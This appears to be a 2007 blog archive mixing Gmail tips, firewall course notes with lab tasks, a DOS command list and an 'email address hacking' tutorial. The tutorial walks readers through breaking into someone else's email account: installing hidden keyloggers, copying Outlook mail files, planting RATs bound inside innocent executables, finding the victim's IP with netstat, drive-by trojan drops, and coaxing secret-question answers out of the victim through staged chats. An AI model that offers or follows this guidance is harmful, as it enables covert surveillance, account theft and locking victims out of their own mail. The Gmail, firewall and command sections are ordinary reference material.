:Gmail has some advanced searching capabilities that, if you take the time to learn, enables you drill down to very specific information. If you want to search for all messages having a specific label, you can click on the "Show search options" link, click the "Search" dropdown, select the desired Lable, and click the "Search Mail" button.But a shortcut is to type the Label prefixed with the "label:" query word in any simple search field at the top of any Gmail page:label:Label1If you want to view all messages that have selected multiple Labels, for example messages having both 'Label1' and 'Label2', enter the following into the simple search field at the top of any Gmail page:label:Label1 label:Label2To see all messages with either 'Label1' or 'Label2', you can enter:label:Label1 OR label:Label2Note: the specific label names are NOT case sensitive, but the "OR" operator is case sensitive, and must be in uppercase. The pipe operator '' can also be used in the same manner as 'OR'.label:Label1 label:Label2
Gmail Tip #6: Advanced Search - 'Query Words'
One of Gmail's excellent features is its Search function.Searching can be as simple as entering a keyword or two into the Search field at the top of any page to very complex using Gmail's advanced "Query Words" to better constrain searches. Clicking the "Show Search Options" link will open up a pane containing several entry fields and dropdowns. This lets you easily specify more detailed search criteria. For example, say you want to search for all email that is unread, regardless of under what Label it is filed. Simply click the "Search:" dropdown, select "Unread Mail" and click the "Search Mail" button. Gmail will display a list of all unread mesasges. Likewise, you can select specific Labels and you can enter specific terms. It's very powerful and useful. Gmail also provides users the ability to prefix their search keywords with "query words" that instruct Gmail how to search. And there is no need to open the Search Options--these can be entered in the simple search window at the top of any page. For example, say you want to search for messages containing attachments from your family sent before May 21, 2004? You would simply enter the following advanced search criteria: label:family has:attachment before:2004/5/21Yes, this could actually be done in the Search Options pane, but in addition to the available search criteria fields, query words not only let you search using criteria not included in the Search Options pane, (like "cc:" and "bcc:") but you can do "compound" searches otherwise not available in the Search Options pane. For example:label:doctors label:statements has:attachment before:2004/5/21 in:anywherewould return all messages with both Labels of "Doctors" and "Statements" containing attachments, sent before May 21, 2004, existing anywhere in my account including the Trash and Spam views.It's pretty powerful, and fairly intuitive once you get the hang of it.For more information, you should check the direct link to Gmail's "How do I use advanced search?" help page found [here] (You may need to be logged into your Gmail account to access this page.)
Gmail Tip #7: 'Official' Features and Bugs Status Page
Want to know what features and bugs the Gmail developers are currently working on? Read on to learn how to access Gmail's new "Features, Fixes, & Feedback" page...First, log into your Gmail account. You must be logged into your account to access the help screens. Next, click on the "Help" link located at the top of any Gmail page. Next, click on the "Send Feedback" link on the left column. You'll be taken to a page detailing features Gmail is working on and bugs being squashed!
Gmail Tip #8: Cleaning Your Contacts
One of Gmail's "features" can leave you with extra entries in your Contacts list. Gmail has a (debatably) nice feature that automatically adds to your Contacts list the email addresses of those to whom you send emails. While this can be helpful at times, just remember that EVERY unique email address you send to gets auto-added. Log into your Gmail account and click on the "Contacts" link at the top of any Gmail page. A window will open displaying any Contacts you may have. Any you have manually edited will typically have a "Name" and possibly a "Note" associated with it. By default, any Contact Gmail auto-adds and is unedited will not contain any "name" or "note" information, just the email address. Visually scan down the list and look for any that fall into this category. If you find one, determine what to do with it: Delete is, Edit it, or leave it alone. Obviously what you do with it is up to you,
Gmail Tip #9: New feature! Import Contacts
For the best explanation of just how to Import Contacts, log into your Gmail account, click on Contacts, and click on the new "Import Contacts" link at the top of the Contacts screen.But what can you import and how do you import? Gmail will let you import address books into Contacts from Yahoo!, Orkut, Outlook, and pretty much any other service by uploading CSV (Comma Separated Value) files to your Gmail account. You can even manually edit and create CVS files for importing using Microsoft Excel.Just remember that currently, Gmail's Contacts fields are limited to just "Name", "Email Address", and "Notes". According to the Help screen, all other fields will be imported into the Notes field.
Gmail Tip #10: Find Your Unread Messages
Want a quick and easy way to view all of your "Unread" messages? If you have assigned Labels and archived unread messages, finding them later can sometines be challenging. Simply create a Gmail Label named "Unread", and you will see all of your unread mail in that folder. Though there are other ways to display unread messages, the nice thing about this method is that it displays the number of unread messages right in the Label list.
Gmail Tip #11: Creating a Pseudo Address Group!
Although Gmail doesn't currently support Groups in your Contacts, you can simulate a Group list by doing the following:Create a new ContactIn the "Name" field, enter the name of your Group (eg "My Friends")In the "E-mail" field, enter your list of email addresses in the following format

Gmail Tip #14: Improved and New Contacts Features!
The "Contacts" function has been enhanced to provide some additional functionality, and now adopts the familiar Gmail interface. Gmail now displays a "Contacts" link in the left column under the "standard views" (Inbox, Starred, etc.) and just above the Labels. Clicking on the link brings up a nicely formatted display that matches the style of the rest og GMail. It displays the contact name, email address, Note, and any additional information (see below). At the top are two "tabs" that display "Frequently Mailed" and "All Contacts". I don't know what the criteria for "Frequently Mailed" is, but it does contain the most-used contacts.Here are some new or expanded features: RECENT CONVERSATIONSClicking on a contact displays the contact information as well as "Recent Conversations" associated with that contact. Clicking on one of these entries opens it normally with all options available. Very nice.ADD MORE CONTACT INFOClicking on "Edit" allows you to update the basic contact information (Names, Email Address, Note). But there's a new link: "Add More Contact Info" which lets you add additional "Sections" of information. For example, by default there are "Personal" and "Work" sections defined. Each section contains a Section Name field, Two user-selectable "fields" and an "Address" block. Each User Field has a drop-down label containing the following selectable labels: Phone, Mobile, FAX, Pager, Email, IM, Company, Title, Other. You can also add additional fields as needed.SEARCH CONTACTSNear the top of the Contacts screen is a Search field and a "Search Contacts" button. Entering text into this field and clicking the button returns all contacts that BEGINS WITH the text. This is important to know because it will search ALL contact fields (even the :extended fields) for words beginning with the entered text. For example, entering "Ste" would return "Stephanie", "Steve", and "Stewart" but entering "phani" would not return "Stephanie". Obviously, it would be nice to have extended search capabilities, but this is an excellent start!Gmail Tip #14: Gmail Tip #16: Auto-forward received Gmail! Want to use your Gmail account as your main email account but have some or all email auto-forwarded to other email accounts? Well, now you can!Gmail has added tha ability to forward received emails in two ways: "All" or "Selective""ALL" FORWARDINGThis is a "global" setting that lets you optionally forward all received email to another email address. Click on the "Settings" link, and click on the new "Forwarding" tab. In there, you have the option do Disable or Enable email forwarding. Click on Enable, enter the email address to which you want to forward, and then select one of the following self-explanatory actions from the associated dropdown:-keep Gmail's copy in the Inbox-archive Gmail's copy-trash Gmail's copyThis setting will forward all received email to another email address and take the appropriate action on the received email."SELECTIVE" FORWARDINGFilters have also been enhanced with a new "Forward it to: emailaddress" action letting you selectivly forward emails based on filter criteria. You can use the same or different email addresss for each filter if you choose providing very powerful email management. For example, I may get statement notifications from a bank and want to auto-copy it to my wife. I just set up a filter to select emails with the bank's sending email address and then select the "Forward it to:" action and enter my wife's email address. Now, she'll get notified also!
Gmail Tip #16: Google Gmail Minibrowser
"The Google Deskbar includes a minibrowser that you can use to quickly open your Gmail account in convenient window that automatically hides and can be accessed with a keyboard shortcut. Read on for more information about this tool... The Google Deskbar is a little Google search tool for Windows taskbar. It can do most of the Google searches using shortcut keys too. (See the link for a picture.) It also include Google's "Minibrowser" which is fast and cute. If you press Ctrl-Alt-G—by default, you can turn it off—you'll go right to the bar. Typing a search, by default, will open in the mini browser—again you can turn it off if you want or have it use your default browser (Firefox, etc). So here's the tip: Go to Options > Customized Searches > Add. Name it "Gmail" and put in the url: http://gmail.google.com/gmail. For the shortcut I used Ctrl M. So if I press Ctrl alt G, then Ctrl M, instant GMail window in the Google Minibrowser! Awesome.(Google Desktop isn't included in the default searches either. (Yet!) But you can also add it in the customize dialogue to search your desktop just as easily. Since the minibrowser vanishes automatically it's tres convenient to find a file!)

email adress hacking

2007-10-16T05:37:00.000-07:00

Introduction
I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...
Things You Should Know
As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.
If You Have Physical Access
I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines. One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user). Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try). Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look inC:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....
www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171
Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs. One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google itOnce you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...
If You Don't Have Physical Access
Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service. The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614. So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account. Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into. Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account. If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need. First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers). Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...

fire wall

2007-10-16T05:36:00.000-07:00

/ Internet Security
Firewalls
In the context of buildings, a firewall is a fireproof wall intended to prevent the spread of fire from one room or area of a building to another. It has acquired a related but an outside-to-inside attack prevention meaning in the context of the Internet. A typical intranet these days is not connected to the Internet directly. Instead, we connect it to a firewall, and channel all transmissions through the firewall.
A firewall is a computer system dedicated to protect a LAN from the Internet at large. It is at the entry point of the LAN it protects. All traffic from/to the LAN to/from any host on the Internet at large goes through a firewall. They receive, inspect and make decisions about all incoming data before it reaches other parts of the system or network. They regulate outgoing data also.
From Internet Security Glossary [RFC 2828, (I) = Internet basis, (C) = Commentary and Additional Guidance] :
Firewall(I) An internetwork gateway that restricts data communication traffic to and from one of the connected networks (the one said to be "inside" the firewall) and thus protects that network’s system resources against threats from the other network (the one that is said to be "outside" the firewall). (See: guard, security gateway.) (C) A firewall typically protects a smaller, secure network (such as a corporate LAN, or even just one host) from a larger network (such as the Internet). The firewall is installed at the point where the networks connect, and the firewall applies security policy rules to control traffic that flows in and out of the protected network.(C) A firewall is not always a single computer. For example, a firewall may consist of a pair of filtering routers and one or more proxy servers running on one or more bastion hosts, all connected to a small, dedicated LAN between the two routers. The external router blocks attacks that use IP to break security (IP address spoofing, source routing, packet fragments), while proxy servers block attacks that would exploit a vulnerability in a higher layer protocol or service. The internal router blocks traffic from leaving the protected network except through the proxy servers. The difficult part is defining criteria by which packets are denied passage through the firewall, because a firewall not only needs to keep intruders out, but usually also needs to let authorized users in and out.
A rigorous definition of what a firewall is not useful as the term has been used with a variety of meanings by the industry. It can be a simple packet filter to an enormously complex computer system with extensive logging systems, intrusion detection systems, etc. Nearly every topic of this course can fit under the heading of "building a firewall. " Instead, let us discuss specific functionality that aids in securing a LAN.
Security Policy
FPRIVATE "TYPE=PICT;ALT=[Screening router diagram]"
Every organization that uses LANs should have rules governing acceptable use of computing resources, security practices, and operational procedures. A firewall is designed to enforce these policies as they apply to the Internet. A firewall cannot protect against inside attacks, buffer overflow exploits, etc.
In this lecture, we discuss the technical details of what a firewall is leaving the development of a security policy to a later lecture.
Dual Homed Gateway
A dual homed gateway is a system that has two or more network interfaces, each of which is connected to a different network. In firewall configurations, a dual homed gateway usually acts to block or filter some or all of the traffic trying to pass between the networks.
Routers
Routers are computer systems with a very focused functionality: route IP packets. As a result, the base computer system is designed optimally for the routing purpose, and often run highly refined and hardened versions of an OS from ROM. Because it is a router, it generally contains several NICs.
A Screening Router is a router configured to permit or deny traffic based on a set of permission rules. A Tunneling Router is a router capable also of encrypting the traffic and encapsulating it for transmission across an untrusted network, for eventual de-encapsulation and decryption. A Screened Host is a host on a network behind a screening router. A screened subnet is a subnet behind a screening router. Such a subnet is also called a ‘’sand box" or "demilitarized zone" network Conceptually, this is similar to a dualhomedgateway, except that an entire network, rather than a single host is reachable from the outside.
A firewall uses NAT (Network Address Translation) to hide the internal workstation addresses, and to re-address all outgoing messages from workstations on the LAN by replacing internal IP addresses with the external IP address of the gateway.
Packet Filter
It filters packets based on certain rules (see Packet Filtering in the References). This is the simplest of the
firewalls. Protocols such as Telnet and SMTP lend themselves to packet filtering. The type of router used in a packet filtering firewall is known as a screening router. A screening router, unlike an ordinary router, determines not only whether or not it can route a packet towards its destination, but also whether or not it should. "Should" or "should not" are determined by the site’s security policy.
Here are some examples of ways in which you might program a screening router to selectively route packets to or from your site:
Block all incoming connections from systems outside the internal network, except for incoming SMTP connections (so that you can receive email).
Block all connections to or from certain systems you distrust.
Allow email and FTP services, but block dangerous services like TFTP, the X Window System, RPC, and the "r" services (rlogin, rsh, rcp, etc.).
You can configure most modern routers to pass or drop packets as above.
The primary disadvantage of any packet filtering gateway is that once access has been granted by the device to a host on the internal network, the attacker has direct access to any exploitable weaknesses in either the software or the configuration of that host. The ability to jump off to other internal hosts from that point is restrained only by the security present on those hosts.
Packet filtering can be static by letting desired methods of connecting between the internal and external networks left open at all times. The advantages of static packet filtering are:
Low Overhead / High Throughput
Inexpensive or free
Good for traffic management
Because it does very little work outside of routing traffic, the overhead is extremely low, so near or at hardware speed traffic is likely. The ability to setup packet filters is standard in most routers. Packet filtering is also always helpful for managing traffic on networks. The disadvantages of static packet filtering are that it:
Allows direct connections to internal hosts by external clients
Permanently leaves holes open in the Network Perimeter
Quickly becomes unmanageable in complex environments
Remains vulnerable to attacks such as "spoofing" source addresses, unless specifically configured to prevent these
Offers no user authentication
Dynamic packet filters open and close "doors" in the firewall based on header information in the data packet. Once a series of packets has passed through the "door" to it’s destination, the firewall closes the door.
Things you cannot do with packet filters include:
URL-level filtering of http transfers,
blocking of Java or ActiveX or other things riding on top of HTTP,
screening FTP commands, for example to allow PUTs but not GETs,
screening e-mail for Sendmail attack scenarios.
Bastion Host
A system that has been hardened to resist attack, and which is installed on a network in such a way that it is expected to potentially come under attack. Bastion hosts are often components of firewalls, or may be "outside" Web servers or public access systems. Generally, a bastion host is running some form of general purpose operating system (e.g., Linux, UNIX, VMS, Winodws, etc.) rather than a ROM-based or firmware operating system like commercial routers do. Bastion hosts are also referred to as "gateway hosts."
DMZ
A Demilitarized Zone (DMZ) is a neutral zone between the private LAN and the public Internet. FTP servers, Web servers and the like are located in DMZ.
Stateful Inspection
Stateful packet filtering is an enhancement to dynamic packet filtering. A stateful inspection firewall examines the state of any active network connections and based on this information determines what packets to accept or reject. This is an active process that does not rely on static rules. The advantages of dynamic packet filtering are that it only temporarily opens holes in the network perimeter, and has low overhead and high throughput.
Circuit Relay
A Circuit Relay is also called a "Circuit Level Gateway." It determines whether the connection between both ends is valid according to configurable rules, then opens a session and permits traffic only from the allowed source and possibly only for a limited period of time.
Whether a connection is valid may be based upon:
destination IP address and/or port
source IP address and/or port
time of day
protocol
user
password
Every session of data exchange is validated and monitored and all traffic is disallowed unless a session is open.
Circuit Level Filtering takes control a step further than a Packet Filter. Among the advantages of a circuit relay is that it can make up for the shortcomings of the ultra-simple and exploitable UDP protocol, wherein the source address is never validated as a function of the protocol. IP spoofing can be rendered much more difficult.
A disadvantage is that Circuit Level Filtering operates at the transport layer and may require substantial modification of the programming which normally provides transport functions (e.g. Winsock).
Proxy services
A proxy server is also called an application gateway, or simply a proxy. A proxy service requires two components: a proxy server and a proxy client. In this example, the proxy server runs on the dual-homed host.
A proxy client is a special version of a normal client program (e.g., a Telnet or FTP client) that talks to the proxy server rather than to the "real" server out on the Internet. After connecting to the proxy, the user is authenticated to the firewall. The proxy server evaluates requests from the proxy client, and decides which to approve and which to deny. If a request is approved, the proxy server contacts the real server on behalf of the client (thus the term "proxy"), and proceeds to relay requests from the proxy client to the real server, and responses from the real server to the proxy client. The proxies provide replacement connections and act as gateways to the services performing all data exchanges with the remote system on their behalf. This can render a host behind the firewall all but invisible to the remote system. It is a gateway because all traffic to and from the remote node goes through it.
In some proxy systems, instead of installing custom client proxy software, standard software is used, but special user procedures are set up.
Transparency is the major benefit of proxy services. To the user, a proxy server presents the illusion that the user is dealing directly with the real server. To the real server, the proxy server presents the illusion that the real server is dealing directly with a user on the proxy host (as opposed to the user’s real host).
Using proxy services with a dual-homed host
Proxy works at the application (telnet, FTP, etc.) level. For example, the FTP proxy might refuse to let users export files, or it might allow users to import files only from certain sites. Application proxies can also verify that the interaction between client and server actually conforms to the protocol in use (i.e., HTTP or FTP). The ability to verify the activities of the applications (rather than focus on packet headers) has been a selling point for proxy firewalls, which are marketed as having more control than packet filters and therefore more security. More sophisticated proxy services might allow different capabilities to different hosts, rather than enforcing the same restrictions on all hosts. This type of firewall may also perform very detailed logging of traffic and monitoring of events on the host system, and can often be instructed to sound alarms or notify an operator under defined conditions. Because they are more involved in the connection, proxy firewalls tend to have lower performance than packet filters.
SOCKS is a proxy construction toolkit, designed to make it easy to convert existing client/server applications into proxy versions of those same applications. The Trusted Information Systems Internet Firewall Toolkit (TIS FWTK) includes proxy servers for a number of common Internet protocols, including Telnet, FTP, HTTP, rlogin, X11, and others; these proxy servers are designed to be used in conjunction with custom user procedures.
Three Myths of Firewalls
Firewalls make the assumption that the only way in or out of a corporate network is through the firewalls; that there are no "back doors" to your network. In practice, this is rarely the case, especially for a network which spans a large enterprise. Users may setup their own backdoors, using modems, terminal servers, or use such programs as "PC Anywhere" so that they can work from home. The more inconvenient a firewall is to your user community, the more likely someone will set up their own "back door" channel to their machine, thus bypassing your firewall.
Firewalls make the assumption that all of the bad guys are on the outside of the firewall, and everyone on the inside of the can be considered trustworthy. This neglects the large number of computer crimes which are committed by insiders.
Newly evolving systems are blurring the lines between data and executables more and more. With macros, JavaScript, Java, and other forms executable fragments which can be embedded inside data, a security model which neglects this will leave you wide open to a wide range of attacks.

Lab Experiment
All work should be carried out in the Operating Systems and Internet Security (OSIS) Lab, 429 Russ. Use any of the PCs numbered 192.168.17.19 to .30. No other WSU facilities are allowed.
The following are links to two directories of files that can together be built as an ISO image to be burned as a bootable Linux CD.
BootCD
IPtables
The above were for a previous version of Linux kernel and distribution. Update them and build a new bootable CD based on current versions of all needed components.

Lab Experiment 2
All work should be carried out in the Operating Systems and Internet Security (OSIS) Lab, 429 Russ. Use any of the PCs numbered 192.168.17.19 to .30. No other WSU facilities are allowed.
On a Windows machine that you "own", download, install and properly configure a firewall. There are several "well known firewalls" that are free for personal use:
Agnitum Outpost
Sygate Personal Firewall
Zone Alarm
Please web-search for download locations.

all dos functions

2007-10-16T05:35:00.000-07:00

All Dos Commands
ADDUSERS Add or list users to/from a CSV fileARP Address Resolution ProtocolASSOC Change file extension associationsASSOCIAT One step file associationAT Schedule a command to run at a later timeATTRIB Change file attributesBOOTCFG Edit Windows boot settingsBROWSTAT Get domain, browser and PDC infoCACLS Change file permissionsCALL Call one batch program from anotherCD Change Directory - move to a specific FolderCHANGE Change Terminal Server Session propertiesCHKDSK Check Disk - check and repair disk problemsCHKNTFS Check the NTFS file systemCHOICE Accept keyboard input to a batch fileCIPHER Encrypt or Decrypt files/foldersCleanMgr Automated cleanup of Temp files, recycle binCLEARMEM Clear memory leaksCLIP Copy STDIN to the Windows clipboard.CLS Clear the screenCLUSTER Windows ClusteringCMD Start a new CMD shellCOLOR Change colors of the CMD windowCOMP Compare the contents of two files or sets of filesCOMPACT Compress files or folders on an NTFS partitionCOMPRESS Compress individual files on an NTFS partitionCON2PRT Connect or disconnect a PrinterCONVERT Convert a FAT drive to NTFS.COPY Copy one or more files to another locationCSVDE Import or Export Active Directory data DATE Display or set the dateDcomcnfg DCOM Configuration UtilityDEFRAG Defragment hard driveDEL Delete one or more filesDELPROF Delete NT user profilesDELTREE Delete a folder and all subfoldersDevCon Device Manager Command Line Utility DIR Display a list of files and foldersDIRUSE Display disk usageDISKCOMP Compare the contents of two floppy disksDISKCOPY Copy the contents of one floppy disk to anotherDNSSTAT DNS StatisticsDOSKEY Edit command line, recall commands, and create macrosDSADD Add user (computer, group..) to active directoryDSQUERY List items in active directoryDSMOD Modify user (computer, group..) in active directoryECHO Display message on screenENDLOCAL End localisation of environment changes in a batch fileERASE Delete one or more filesEXIT Quit the CMD shellEXPAND Uncompress filesEXTRACT Uncompress CAB filesFC Compare two filesFDISK Disk Format and partitionFIND Search for a text string in a fileFINDSTR Search for strings in filesFOR Conditionally perform a command several timesFORFILES Batch process multiple filesFORMAT Format a diskFREEDISK Check free disk space (in bytes)FSUTIL File and Volume utilitiesFTP File Transfer ProtocolFTYPE Display or modify file types used in file extension associationsGLOBAL Display membership of global groupsGOTO Direct a batch program to jump to a labelled lineHELP Online HelpHFNETCHK Network Security Hotfix Checker IF Conditionally perform a commandIFMEMBER Is the current user in an NT WorkgroupIPCONFIG Configure IPKILL Remove a program from memoryLABEL Edit a disk labelLOCAL Display membership of local groupsLOGEVENT Write text to the NT event viewer.LOGOFF Log a user offLOGTIME Log the date and time in a fileMAPISEND Send email from the command lineMEM Display memory usageMD Create new foldersMODE Configure a system deviceMORE Display output, one screen at a timeMOUNTVOL Manage a volume mount pointMOVE Move files from one folder to anotherMOVEUSER Move a user from one domain to anotherMSG Send a messageMSIEXEC Microsoft Windows InstallerMSINFO Windows NT diagnosticsMSTSC Terminal Server Connection (Remote Desktop Protocol)MUNGE Find and Replace text within file(s)MV Copy in-use filesNET Manage network resourcesNETDOM Domain ManagerNETSH Configure network protocolsNETSVC Command-line Service ControllerNBTSTAT Display networking statistics (NetBIOS over TCP/IP)NETSTAT Display networking statistics (TCP/IP)NOW Display the current Date and Time NSLOOKUP Name server lookupNTBACKUP Backup folders to tapeNTRIGHTS Edit user account rightsPATH Display or set a search path for executable filesPATHPING Trace route plus network latency and packet lossPAUSE Suspend processing of a batch file and display a messagePERMS Show permissions for a userPERFMON Performance MonitorPING Test a network connectionPOPD Restore the previous value of the current directory saved by PUSHDPORTQRY Display the status of ports and servicesPRINT Print a text filePRNCNFG Display, configure or rename a printerPRNMNGR Add, delete, list printers set the default printerPROMPT Change the command promptPsExec Execute process remotelyPsFile Show files opened remotelyPsGetSid Display the SID of a computer or a userPsInfo List information about a systemPsKill Kill processes by name or process IDPsList List detailed information about processesPsLoggedOn Who's logged on (locally or via resource sharing)PsLogList Event log recordsPsPasswd Change account passwordPsService View and control servicesPsShutdown Shutdown or reboot a computerPsSuspend Suspend processesPUSHD Save and then change the current directoryQGREP Search file(s) for lines that match a given pattern.RASDIAL Manage RAS connectionsRASPHONE Manage RAS connectionsRECOVER Recover a damaged file from a defective disk.REG Read, Set or Delete registry keys and valuesREGEDIT Import or export registry settingsREGSVR32 Register or unregister a DLLREGINI Change Registry PermissionsREM Record comments (remarks) in a batch fileREN Rename a file or files.REPLACE Replace or update one file with anotherRD Delete folder(s)RDISK Create a Recovery DiskRMTSHARE Share a folder or a printerROBOCOPY Robust File and Folder CopyROUTE Manipulate network routing tablesRUNAS Execute a program under a different user accountRUNDLL32 Run a DLL command (add/remove print connections)SC Service ControlSCHTASKS Create or Edit Scheduled Tasks SCLIST Display NT ServicesScriptIt Control GUI applicationsSET Display, set, or remove environment variablesSETLOCAL Begin localisation of environment changes in a batch fileSETX Set environment variables permanently SHARE List or edit a file share or print shareSHIFT Shift the position of replaceable parameters in a batch fileSHORTCUT Create a windows shortcut (.LNK file)SHOWGRPS List the NT Workgroups a user has joinedSHOWMBRS List the Users who are members of a WorkgroupSHUTDOWN Shutdown the computerSLEEP Wait for x secondsSOON Schedule a command to run in the near futureSORT Sort inputSTART Start a separate window to run a specified program or commandSU Switch UserSUBINACL Edit file and folder Permissions, Ownership and DomainSUBST Associate a path with a drive 